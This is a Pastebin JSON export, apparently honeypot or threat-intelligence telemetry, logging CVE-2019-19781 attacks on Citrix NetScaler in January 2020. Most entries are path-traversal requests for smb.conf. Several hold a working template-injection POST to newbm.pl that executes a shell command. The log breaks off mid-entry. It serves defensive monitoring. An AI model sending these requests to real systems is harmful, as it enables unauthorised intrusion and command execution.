Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "count": 58,
- "next": null,
- "previous": null,
- "results": [
- {
- "source_ip_address": "45.148.10.184",
- "country": "NL",
- "user_agent": "Mozilla/5.0 zgrab/0.x",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 25,
- "first_seen": "2020-01-16T04:12:45Z",
- "last_seen": "2020-01-17T03:48:33Z"
- },
- {
- "source_ip_address": "5.101.0.209",
- "country": "RU",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1813,
- "first_seen": "2020-01-12T12:16:24Z",
- "last_seen": "2020-01-17T02:42:38Z"
- },
- {
- "source_ip_address": "74.63.222.154",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 9,
- "first_seen": "2020-01-15T19:59:58Z",
- "last_seen": "2020-01-17T02:39:53Z"
- },
- {
- "source_ip_address": "71.6.202.253",
- "country": "US",
- "user_agent": "Research Only, don't at me greynoise",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 42,
- "first_seen": "2020-01-16T21:49:29Z",
- "last_seen": "2020-01-17T01:10:46Z"
- },
- {
- "source_ip_address": "69.162.68.54",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-17T00:55:44Z",
- "last_seen": "2020-01-17T00:55:44Z"
- },
- {
- "source_ip_address": "69.162.106.70",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-16T18:17:13Z",
- "last_seen": "2020-01-16T18:17:13Z"
- },
- {
- "source_ip_address": "69.162.106.70",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-01-16T17:04:57Z",
- "last_seen": "2020-01-16T17:04:57Z"
- },
- {
- "source_ip_address": "74.63.213.118",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-16T16:08:47Z",
- "last_seen": "2020-01-16T16:08:47Z"
- },
- {
- "source_ip_address": "74.63.246.42",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 59,
- "first_seen": "2020-01-16T14:25:02Z",
- "last_seen": "2020-01-16T14:25:02Z"
- },
- {
- "source_ip_address": "216.144.247.254",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-01-16T11:53:54Z",
- "last_seen": "2020-01-16T13:34:10Z"
- },
- {
- "source_ip_address": "63.143.57.26",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-16T13:02:18Z",
- "last_seen": "2020-01-16T13:02:18Z"
- },
- {
- "source_ip_address": "69.162.126.62",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-01-16T10:41:33Z",
- "last_seen": "2020-01-16T10:41:33Z"
- },
- {
- "source_ip_address": "63.143.53.142",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-16T10:08:55Z",
- "last_seen": "2020-01-16T10:08:55Z"
- },
- {
- "source_ip_address": "216.245.216.22",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 85,
- "first_seen": "2020-01-16T10:02:30Z",
- "last_seen": "2020-01-16T10:02:30Z"
- },
- {
- "source_ip_address": "69.162.68.54",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-16T06:49:38Z",
- "last_seen": "2020-01-16T06:49:38Z"
- },
- {
- "source_ip_address": "74.63.253.190",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-16T05:50:04Z",
- "last_seen": "2020-01-16T05:50:04Z"
- },
- {
- "source_ip_address": "5.101.0.209",
- "country": "RU",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1943,
- "first_seen": "2020-01-12T13:20:04Z",
- "last_seen": "2020-01-16T04:56:29Z"
- },
- {
- "source_ip_address": "107.173.214.153",
- "country": "US",
- "user_agent": "curl/7.67.0",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 4,
- "first_seen": "2020-01-16T01:10:53Z",
- "last_seen": "2020-01-16T01:10:53Z"
- },
- {
- "source_ip_address": "74.63.192.130",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-15T20:44:38Z",
- "last_seen": "2020-01-15T20:44:38Z"
- },
- {
- "source_ip_address": "45.148.10.184",
- "country": "NL",
- "user_agent": "Patch your Citrix !",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-15T14:10:59Z",
- "last_seen": "2020-01-15T17:21:47Z"
- },
- {
- "source_ip_address": "69.162.123.62",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-15T14:02:38Z",
- "last_seen": "2020-01-15T16:35:25Z"
- },
- {
- "source_ip_address": "83.97.20.145",
- "country": "RO",
- "user_agent": "Patch your Citrix !",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 123,
- "first_seen": "2020-01-15T03:47:01Z",
- "last_seen": "2020-01-15T10:45:56Z"
- },
- {
- "source_ip_address": "69.162.126.62",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-15T10:11:40Z",
- "last_seen": "2020-01-15T10:11:40Z"
- },
- {
- "source_ip_address": "193.57.40.46",
- "country": "UA",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 503,
- "first_seen": "2020-01-12T22:25:24Z",
- "last_seen": "2020-01-15T09:22:21Z"
- },
- {
- "source_ip_address": "82.217.91.74",
- "country": "NL",
- "user_agent": "curl/7.67.0",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 7,
- "first_seen": "2020-01-15T08:01:57Z",
- "last_seen": "2020-01-15T08:50:17Z"
- },
- {
- "source_ip_address": "185.150.9.193",
- "country": "CH",
- "user_agent": "",
- "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 10,
- "first_seen": "2020-01-15T08:48:34Z",
- "last_seen": "2020-01-15T08:48:34Z"
- },
- {
- "source_ip_address": "185.150.9.193",
- "country": "CH",
- "user_agent": "",
- "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 10,
- "first_seen": "2020-01-15T08:14:12Z",
- "last_seen": "2020-01-15T08:14:12Z"
- },
- {
- "source_ip_address": "74.63.253.190",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-15T03:18:44Z",
- "last_seen": "2020-01-15T03:18:44Z"
- },
- {
- "source_ip_address": "74.63.246.42",
- "country": "US",
- "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 6,
- "first_seen": "2020-01-14T23:16:27Z",
- "last_seen": "2020-01-14T23:16:27Z"
- },
- {
- "source_ip_address": "54.38.157.11",
- "country": "DE",
- "user_agent": "curl/7.67.0",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 47,
- "first_seen": "2020-01-13T03:13:30Z",
- "last_seen": "2020-01-14T15:33:33Z"
- },
- {
- "source_ip_address": "185.234.216.20",
- "country": "IE",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "payload": "GET /vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 293,
- "first_seen": "2020-01-11T13:15:51Z",
- "last_seen": "2020-01-14T11:11:44Z"
- },
- {
- "source_ip_address": "185.234.216.20",
- "country": "IE",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 51,
- "first_seen": "2020-01-13T19:01:01Z",
- "last_seen": "2020-01-14T01:27:27Z"
- },
- {
- "source_ip_address": "82.102.16.220",
- "country": "DE",
- "user_agent": "curl/7.58.0",
- "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 5,
- "first_seen": "2020-01-10T00:07:56Z",
- "last_seen": "2020-01-13T13:16:31Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "GET /vpn/../vpns/portal/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml HTTP/1.1",
- "post_data": "",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-12T08:45:42Z",
- "last_seen": "2020-01-12T08:45:43Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
- "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
- "target_port": 2087,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T08:45:41Z",
- "last_seen": "2020-01-12T08:45:41Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "GET /vpn/../vpns/portal/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-12T08:23:19Z",
- "last_seen": "2020-01-12T08:23:20Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
- "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T08:23:19Z",
- "last_seen": "2020-01-12T08:23:19Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "GET /vpn/../vpns/portal/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-12T08:01:34Z",
- "last_seen": "2020-01-12T08:01:35Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
- "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T08:01:33Z",
- "last_seen": "2020-01-12T08:01:33Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "GET /vpn/../vpns/portal/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-12T07:50:59Z",
- "last_seen": "2020-01-12T07:50:59Z"
- },
- {
- "source_ip_address": "156.17.191.239",
- "country": "PL",
- "user_agent": "curl/7.52.1",
- "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
- "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T07:50:58Z",
- "last_seen": "2020-01-12T07:50:58Z"
- },
- {
- "source_ip_address": "5.129.216.29",
- "country": "RU",
- "user_agent": "Mozilla/5.0",
- "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T07:03:45Z",
- "last_seen": "2020-01-12T07:03:45Z"
- },
- {
- "source_ip_address": "78.41.182.12",
- "country": "RU",
- "user_agent": "Mozilla/5.0",
- "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-12T06:59:10Z",
- "last_seen": "2020-01-12T06:59:10Z"
- },
- {
- "source_ip_address": "85.93.137.133",
- "country": "RU",
- "user_agent": "Mozilla/5.0",
- "payload": "GET /vpns/cfg/smb.conf HTTP/1.0",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-12T06:53:05Z",
- "last_seen": "2020-01-12T06:53:05Z"
- },
- {
- "source_ip_address": "95.221.163.206",
- "country": "RU",
- "user_agent": "Mozilla/5.0",
- "payload": "GET /vpns/ HTTP/1.0",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Possible Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-01-11T08:31:17Z",
- "last_seen": "2020-01-11T08:31:17Z"
- },
- {
- "source_ip_address": "194.190.64.90",
- "country": "RU",
- "user_agent": "Mozilla/5.0",
- "payload": "GET /vpns/ HTTP/1.0",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Possible Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-11T08:29:34Z",
- "last_seen": "2020-01-11T08:29:34Z"
- },
- {
- "source_ip_address": "172.105.64.188",
- "country": "DE",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 284,
- "first_seen": "2020-01-09T21:28:04Z",
- "last_seen": "2020-01-10T10:31:56Z"
- },
- {
- "source_ip_address": "157.245.226.196",
- "country": "US",
- "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
- "payload": "GET /vpn/../vpns/ HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "CVE-2019-19781",
- "category": "Platform",
- "description": "Citrix NetScaler Gateway Scan"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-01-10T03:08:58Z",
- "last_seen": "2020-01-10T03:08:58Z"
- },
- {
- "source_ip_address": "85.90.247.110",
- "country": "DE",
